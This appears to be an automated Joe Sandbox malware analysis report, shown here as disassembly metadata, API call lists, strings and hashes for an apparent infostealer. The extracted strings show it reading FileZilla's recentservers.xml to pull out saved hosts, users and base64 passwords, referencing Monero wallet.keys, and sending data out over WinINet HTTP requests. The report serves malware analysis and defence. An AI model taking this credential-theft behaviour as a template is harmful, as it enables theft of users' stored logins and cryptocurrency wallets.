                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: *6K
                            • API String ID: 0-1576332575
                            • Opcode ID: efe6fdb33c3cd30a32d8ff1462826c3c9afe77818c2fb09da98f562b0229739b
                            • Instruction ID: 7e44920e1c3b67966cd9db23919e379f3cd4b7f22bd204f2fec2b04b707aae44
                            • Opcode Fuzzy Hash: efe6fdb33c3cd30a32d8ff1462826c3c9afe77818c2fb09da98f562b0229739b
                            • Instruction Fuzzy Hash: 2B3126F76291058FF74C6D3CED9A37B7AD6EB54310F29463DEA82C27C4ED28A9004255
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7565023c0a13fcf432fe27c40ebe2e17f67e910ee3be9337b5deeba30c9804a0
                            • Instruction ID: b002a41d1f167cdabe82d681ee91348d2e017191c876a7967f3e3b41f33cc601
                            • Opcode Fuzzy Hash: 7565023c0a13fcf432fe27c40ebe2e17f67e910ee3be9337b5deeba30c9804a0
                            • Instruction Fuzzy Hash: 4591E4F3A182009FF308AE39DC8537AB7D6EB94310F1A853DDBC587784E97948458786
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e6eac949e560daaac3d7aefe717704ebe8ae4806b3abe543889ed8d73b8ecaa1
                            • Instruction ID: b7bb758f7d3969b26e652b8e1b1741a284fbf73283d5085fc04aeaeb11e89a41
                            • Opcode Fuzzy Hash: e6eac949e560daaac3d7aefe717704ebe8ae4806b3abe543889ed8d73b8ecaa1
                            • Instruction Fuzzy Hash: 295159B3A083185FE3006E7DED8576BBBDADBD4230F2B463EE984C3748E97559054292
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42e08f651da0986346a13dd00abcd7a5bee16645ccd5a981fa56f8d396e3e549
                            • Instruction ID: 14c0397f7656414f983149431464487bee2f59d9e9a1f01c635f0ca37187dcbd
                            • Opcode Fuzzy Hash: 42e08f651da0986346a13dd00abcd7a5bee16645ccd5a981fa56f8d396e3e549
                            • Instruction Fuzzy Hash: D651F8F3E096105FF308AA2DDC9577BB7D6DBD4320F1B853DAAC887744E93858028696
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 56cfeeb526c2752c148f1f530e93f1629d2e60cb532cb812a936f4141da4e995
                            • Instruction ID: d458d9369e465ec71842f20ad004810c91235cd6c098dbef56ef575db661aeca
                            • Opcode Fuzzy Hash: 56cfeeb526c2752c148f1f530e93f1629d2e60cb532cb812a936f4141da4e995
                            • Instruction Fuzzy Hash: 7351C2F3A1C6145FF3186E28DC8677AB7D6EB94310F1A853DDBC887380E9395814878A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: fd6e72e764fa950d8401a2ddca3068dd686751134510031c221f9e1716f2e4ad
                            • Instruction ID: 76aa682c41d999d192a0ba0eff4de3bc71bd801ec1e55415625798205cdc6d8b
                            • Opcode Fuzzy Hash: fd6e72e764fa950d8401a2ddca3068dd686751134510031c221f9e1716f2e4ad
                            • Instruction Fuzzy Hash: 5F5191B2A096005FE314AF2DEC8176ABBE6EBD4310F06893DD5C4C7344EA755455C787
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                            • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                            • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00EC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00EC8E0B
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EB99EC
                              • Part of subcall function 00EB99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EB9A11
                              • Part of subcall function 00EB99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EB9A31
                              • Part of subcall function 00EB99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EB148F,00000000), ref: 00EB9A5A
                              • Part of subcall function 00EB99C0: LocalFree.KERNEL32(00EB148F), ref: 00EB9A90
                              • Part of subcall function 00EB99C0: CloseHandle.KERNEL32(000000FF), ref: 00EB9A9A
                              • Part of subcall function 00EC8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EC8E52
                            • GetProcessHeap.KERNEL32(00000000,000F423F,00ED0DBA,00ED0DB7,00ED0DB6,00ED0DB3), ref: 00EC0362
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EC0369
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00EC0385
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC0393
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00EC03CF
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC03DD
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00EC0419
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC0427
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00EC0463
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC0475
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC0502
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC051A
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC0532
                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC054A
                            • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00EC0562
                            • lstrcat.KERNEL32(?,profile: null), ref: 00EC0571
                            • lstrcat.KERNEL32(?,url: ), ref: 00EC0580
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC0593
                            • lstrcat.KERNEL32(?,00ED1678), ref: 00EC05A2
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC05B5
                            • lstrcat.KERNEL32(?,00ED167C), ref: 00EC05C4
                            • lstrcat.KERNEL32(?,login: ), ref: 00EC05D3
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC05E6
                            • lstrcat.KERNEL32(?,00ED1688), ref: 00EC05F5
                            • lstrcat.KERNEL32(?,password: ), ref: 00EC0604
                            • lstrcat.KERNEL32(?,00000000), ref: 00EC0617
                            • lstrcat.KERNEL32(?,00ED1698), ref: 00EC0626
                            • lstrcat.KERNEL32(?,00ED169C), ref: 00EC0635
                            • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00ED0DB2), ref: 00EC068E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 1942843190-555421843
                            • Opcode ID: 83625a9e86b815ba680cfa3779fb041488ce82446cfb97b18980849cf66a5cf4
                            • Instruction ID: 8a6910799b18b37f266b28bce48ef6ea61a5ea4c40d78233e29aed46184a43a1
                            • Opcode Fuzzy Hash: 83625a9e86b815ba680cfa3779fb041488ce82446cfb97b18980849cf66a5cf4
                            • Instruction Fuzzy Hash: F0D12B72900208ABCB14EBE0DE9AEEE7378FF14304F54552DF106B6185DA76AA07CB61
                            APIs
                              • Part of subcall function 00ECA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ECA7E6
                              • Part of subcall function 00EB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00EB4839
                              • Part of subcall function 00EB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00EB4849
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00EB59F8
                            • StrCmpCA.SHLWAPI(?,00A9E3D0), ref: 00EB5A13
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00EB5B93
                            • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00A9E410,00000000,?,00A9C958,00000000,?,00ED1A1C), ref: 00EB5E71
                            • lstrlen.KERNEL32(00000000), ref: 00EB5E82
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00EB5E93
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EB5E9A
                            • lstrlen.KERNEL32(00000000), ref: 00EB5EAF
                            • lstrlen.KERNEL32(00000000), ref: 00EB5ED8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00EB5EF1
                            • lstrlen.KERNEL32(00000000,?,?), ref: 00EB5F1B
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00EB5F2F
                            • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00EB5F4C
                            • InternetCloseHandle.WININET(00000000), ref: 00EB5FB0
                            • InternetCloseHandle.WININET(00000000), ref: 00EB5FBD
                            • HttpOpenRequestA.WININET(00000000,00A9E3F0,?,00A9DC50,00000000,00000000,00400100,00000000), ref: 00EB5BF8
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • InternetCloseHandle.WININET(00000000), ref: 00EB5FC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1709013064.0000000000EB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true
                            • Associated: 00000001.00000002.1708989828.0000000000EB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F61000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709013064.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.000000000110E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001295000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001375000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.0000000001398000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709187719.00000000013B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709466591.00000000013B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709581110.0000000001550000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1709599684.0000000001551000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_eb0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 874700897-2180234286
                            • Opcode ID: dc6b22a484ecc2f2828c4ea2873942ef5dec5dd44fdbb10908b40ed0d8750aeb
                            • Instruction ID: c18e1698a2a0a21e13aff5037e93799127c2b4ad90187be5e29a140b0dfefc88
                            • Opcode Fuzzy Hash: dc6b22a484ecc2f2828c4ea2873942ef5dec5dd44fdbb10908b40ed0d8750aeb
                            • Instruction Fuzzy Hash: 86120E7291011CABCB18EBA0DD9AFEE73B8BF54704F4451ADB10A72091DF312A4ACF55
                            APIs
                              • Part of subcall function 00ECA740: lstrcpy.KERNEL32(00ED0E17,00000000), ref: 00ECA788
                              • Part of subcall function 00ECA9B0: lstrlen.KERNEL32(?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00ECA9C5
                              • Part of subcall function 00ECA9B0: lstrcpy.KERNEL32(00000000), ref: 00ECAA04
                              • Part of subcall function 00ECA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ECAA12
                              • Part of subcall function 00ECA8A0: lstrcpy.KERNEL32(?,00ED0E17), ref: 00ECA905
                              • Part of subcall function 00EC8B60: GetSystemTime.KERNEL32(00ED0E1A,00A9C988,00ED05AE,?,?,00EB13F9,?,0000001A,00ED0E1A,00000000,?,00A988C8,?,\Monero\wallet.keys,00ED0E17), ref: 00EC8B86
                              • Part of subcall function 00ECA920: lstrcpy.KERNEL32(00000000,?), ref: 00ECA972
                              • Part of subcall function 00ECA920: lstrcat.KERNEL32(00000000), ref: 00ECA982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00EBCF83
                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00EBD0C7
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00EBD0CE
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD208
                            • lstrcat.KERNEL32(?,00ED1478), ref: 00EBD217
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD22A
                            • lstrcat.KERNEL32(?,00ED147C), ref: 00EBD239
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD24C
                            • lstrcat.KERNEL32(?,00ED1480), ref: 00EBD25B
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD26E
                            • lstrcat.KERNEL32(?,00ED1484), ref: 00EBD27D
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD290
                            • lstrcat.KERNEL32(?,00ED1488), ref: 00EBD29F
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD2B2
                            • lstrcat.KERNEL32(?,00ED148C), ref: 00EBD2C1
                            • lstrcat.KERNEL32(?,00000000), ref: 00EBD2D4
                            • lstrcat.KERNEL32(?,00ED1490), ref: 00EBD2E3
